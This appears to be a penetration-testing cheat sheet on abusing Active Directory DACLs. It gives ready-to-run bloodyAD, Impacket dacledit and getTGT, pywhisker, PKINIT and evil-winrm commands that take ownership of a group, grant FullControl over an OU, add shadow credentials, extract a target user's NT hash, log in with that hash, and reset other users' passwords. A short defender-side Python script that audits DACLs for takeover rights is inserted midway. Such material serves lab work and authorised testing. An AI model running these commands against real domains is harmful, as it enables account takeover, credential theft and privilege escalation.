
DACL (Discretionary Access Control List) Attack

Last modified: 2025-04-19

A DACL is the list of access control entries (ACEs) that specify which trustees are allowed or denied access to an object in Active Directory.

Set Ownership of Group

Using bloodyAD, we can set a user as the owner of a group.

# Install if it does not exist on your machine.
pipx install bloodyAD

bloodyAD --host dc.example.local -d example.local -u <username> -p <password> set owner <group-name> <username>

Add Rights

We may be able to take full control of securable objects by obtaining the GenericAll permission on an OU (Organizational Unit).

1. Ask TGT for Kerberos Authentication

If we want to use Kerberos authentication for attacking the DACL, we first need to retrieve a TGT for the specific user. In addition, to avoid authentication errors, we need to synchronize the system time with the domain controller using ntpdate or rdate.

# Sync datetime with target system
sudo ntpdate <target-ip>
# or
sudo rdate -n <target-ip>

impacket-getTGT -dc-ip <target-ip> example.local/username:password

getTGT above writes a .ccache file that stores the TGT.

After the .ccache file has been written, point the KRB5CCNAME environment variable at it so that the later steps can use it.

export KRB5CCNAME=username.ccache

2. Read DACL

We can use dacledit from Impacket.
To use dacledit, clone the repository and install its dependencies as below:

git clone https://github.com/fortra/impacket.git
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install impacket
pip3 install -r requirements.txt
python3 examples/dacledit.py --help

Note: This repository is updated frequently, so errors may occur. If so, try using git log and git checkout <prev_commit_id> to revert to a previous commit and then run it again.

Then run the following command:

python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k

3. Write DACL

python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn 'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn 'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
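As an added, defender-side example (not part of the original notes, and not code from impacket or bloodyAD), the following Python audits an object's security descriptor in SDDL form for ACEs that grant takeover rights (GenericAll, which is what the 'FullControl' write above sets, plus GenericWrite, WriteDacl and WriteOwner) to principals outside an expected allowlist. The SDDL string and the user SID inside it are constructed sample data.

```python
import re

# SDDL two-letter right codes -> ACCESS_MASK bits (generic, standard and AD-specific rights)
RIGHT_CODES = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
# Rights that let the holder take over the object (what FullControl / set owner rely on)
TAKEOVER_BITS = {"GenericAll": 0x10000000, "GenericWrite": 0x40000000,
                 "WriteDacl": 0x00040000, "WriteOwner": 0x00080000}
# SDDL aliases of principals expected to hold such rights; anything else is flagged
EXPECTED_PRINCIPALS = {"SY", "DA", "EA", "BA"}

def parse_rights(field):
    """Decode an SDDL rights field: either a hex mask or concatenated two-letter codes."""
    if field.startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHT_CODES[field[i:i + 2]]
    return mask

def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as dicts (type, flags, mask, sid)."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1)) if m else []:
        ace_type, flags, rights, _obj, _inh, sid = ace.split(";")[:6]
        aces.append({"type": ace_type, "flags": flags,
                     "mask": parse_rights(rights), "sid": sid})
    return aces

def find_takeover_aces(sddl, expected=EXPECTED_PRINCIPALS):
    """List (sid, [right names]) for allow ACEs granting takeover rights to unexpected SIDs."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA") or ace["sid"] in expected:
            continue
        hits = [name for name, bit in TAKEOVER_BITS.items() if ace["mask"] & bit]
        if hits:
            findings.append((ace["sid"], hits))
    return findings

# Constructed sample: an OU DACL with the usual Domain Admins / SYSTEM / Authenticated Users
# entries plus an inheritable GenericAll ACE for an ordinary domain user SID.
SAMPLE_SDDL = ("O:DAG:DAD:AI(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)"
               "(A;;RPLCLORC;;;AU)(A;CI;GA;;;S-1-5-21-1111111111-2222222222-3333333333-1105)")

if __name__ == "__main__":
    for sid, rights in find_takeover_aces(SAMPLE_SDDL):
        print(f"{sid}: {', '.join(rights)}")
```

The object-type GUID fields of object ACEs are parsed but ignored, so a property-scoped ACE is judged by its access mask alone.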

Abuse

After adding rights, we can abuse them in various ways.

Method 1. Add User to Group → Get TGT → Get NT Hash

# 1. Add user to a specific group (replace the group distinguished name with your target)
bloodyAD --host <target-ip> -u <username> -p <password> add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>

# 2. Add a shadow credential (msDS-KeyCredentialLink) to the target user with pywhisker; it writes a PFX certificate
python3 pywhisker.py -d example.local -u <username> -p <password> --target <target-username> --action add

# 3. Obtain a Kerberos TGT using PKINIT authentication with a PFX certificate
python3 gettgtpkinit.py example.local/<target-username> -cert-pfx <pfx-filepath> -pfx-pass <pfx-password> ./example.ccache

export KRB5CCNAME=./example.ccache

# 4. Retrieve the NT hash of the target user using the obtained Kerberos ticket (<key> is the AS-REP encryption key printed by gettgtpkinit.py)
python3 getnthash.py example.local/<target-username> -key <key>

# 5. Login with the retrieved NT hash
evil-winrm -i <target-ip> -u <target-username> -H <nt-hash>

Method 2. Set Password of Another User

If a user has permission to set another user's password, we can change it:

bloodyAD --host <target-ip> -u <username> -p <password> set password '<target-username>' '<new-password>'
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k set password '<target-username>' '<new-password>'

After that, we can try further attacks as this user.